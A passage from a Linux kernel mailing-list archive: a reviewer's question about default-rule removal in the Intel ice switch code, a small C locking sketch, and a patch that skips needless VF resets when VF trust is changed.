And since ice_remove_rule_internal() does not appear to validate the
vsi_handle for non-list rules:
ice_switch.c:ice_remove_rule_internal() {
if (list_elem->fltr_info.fltr_act != ICE_FWD_TO_VSI_LIST) {
remove_rule = true;
...
}
Could this blindly remove the default forwarding configuration for a
completely unrelated VSI?
> if (test_bit(ICE_FLAG_RSS_ENA, pf->flags))
> ice_rss_clean(vsi);
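
The general shape of the concern above (a check and a clear that each
take the lock separately) versus a combined check-and-clear under one
lock hold can be sketched in userspace C. This is a generic illustration
with hypothetical names (struct demo_switch, DEMO_NO_OWNER,
demo_clear_dflt_if_owner()) and a pthread mutex standing in for the
filter rule lock; whether the ice switch code can be restructured this
way is not established here.

```c
#include <pthread.h>
#include <stdbool.h>

#define DEMO_NO_OWNER (-1)

/* Hypothetical switch state: one default-rule owner, guarded by a lock. */
struct demo_switch {
	pthread_mutex_t lock;
	int dflt_owner;		/* VSI handle owning the default rule, or DEMO_NO_OWNER */
};

/*
 * Clear the default rule only if @vsi still owns it. The ownership check
 * and the removal happen under a single lock hold, so another thread
 * cannot install a new default rule between the two steps.
 */
static bool demo_clear_dflt_if_owner(struct demo_switch *sw, int vsi)
{
	bool cleared = false;

	pthread_mutex_lock(&sw->lock);
	if (sw->dflt_owner == vsi) {
		sw->dflt_owner = DEMO_NO_OWNER;
		cleared = true;
	}
	pthread_mutex_unlock(&sw->lock);

	return cleared;
}
```

Here a caller that no longer owns the rule gets false back and the
current owner's rule is left in place, because the removal is keyed on
the owner rather than on "whatever default rule exists now".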
^ permalink raw reply
* [PATCH net v7 4/4] ice: skip unnecessary VF reset when setting trust
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:18 UTC (permalink / raw)
To: netdev
Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
pabeni, Jose Ignacio Tornos Martinez
In-Reply-To: <20260623101800.991293-1-jtornosm@redhat.com>
Similar to the i40e fix, ice_set_vf_trust() unconditionally calls
ice_reset_vf() when the trust setting changes. While the delay is smaller
than i40e, this reset is still unnecessary in most cases.
When granting trust, no reset is needed - we can just set the capability
flag to allow privileged operations.
When revoking trust, we only need to reset (conservative approach) if
the VF has actually configured advanced features that require cleanup
(MAC LLDP filters, promiscuous mode). For VFs in a clean state, we can
safely change the trust setting without the disruptive reset.
When we do reset, we maintain the original ice pattern that has been
reliable in production: cleanup LLDP filters first, then set vf->trusted,
then reset. This ensures the privilege capability bit is handled correctly
during reset rebuild.
When we don't reset, we manually handle the capability flag via helper
function, eliminating the delay.
Signed-off-by: Jose Ignacio Tornos Martinez <jtornosm@redhat.com>
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
---
v7: Rebase on current net tree (no code changes from v6)
v6: https://lore.kernel.org/all/20260619061321.8554-5-jtornosm@redhat.com/
drivers/net/ethernet/intel/ice/ice_sriov.c | 33 +++++++++++++++++++---
1 file changed, 29 insertions(+), 4 deletions(-)
diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
index 7e00e091756d..XXXXXXXXXXXXXXXX 100644
--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
+++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
@@ -1364,6 +1364,23 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
return __ice_set_vf_mac(ice_netdev_to_pf(netdev), vf_id, mac);
}
+/**
+ * ice_setup_vf_trust - Enable/disable VF trust mode without reset
+ * @vf: VF to configure
+ * @setting: trust setting
+ *
+ * Update VF flags when changing trust without performing a VF reset.
+ * This is only called when it's safe to skip the reset (VF has no advanced
+ * features configured that need cleanup).
+ */
+static void ice_setup_vf_trust(struct ice_vf *vf, bool setting)
+{
+ if (setting)
+ set_bit(ICE_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+ else
+ clear_bit(ICE_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+}
+
/**
* ice_set_vf_trust
* @netdev: network interface device structure
@@ -1399,11 +1416,19 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
mutex_lock(&vf->cfg_lock);
- while (!trusted && vf->num_mac_lldp)
- ice_vf_update_mac_lldp_num(vf, ice_get_vf_vsi(vf), false);
-
+ /* Reset only if revoking trust and VF has advanced features configured */
+ if (!trusted &&
+ (vf->num_mac_lldp > 0 ||
+ test_bit(ICE_VF_STATE_UC_PROMISC, vf->vf_states) ||
+ test_bit(ICE_VF_STATE_MC_PROMISC, vf->vf_states))) {
+ while (vf->num_mac_lldp)
+ ice_vf_update_mac_lldp_num(vf, ice_get_vf_vsi(vf), false);
+ vf->trusted = trusted;
+ ice_reset_vf(vf, ICE_VF_RESET_NOTIFY);
+ } else {
+ vf->trusted = trusted;
+ ice_setup_vf_trust(vf, trusted);
+ }
- vf->trusted = trusted;
- ice_reset_vf(vf, ICE_VF_RESET_NOTIFY);
dev_info(ice_pf_to_dev(pf), "VF %u is now %strusted\n",
vf_id, trusted ? "" : "un");
--
2.43.0
^ permalink raw reply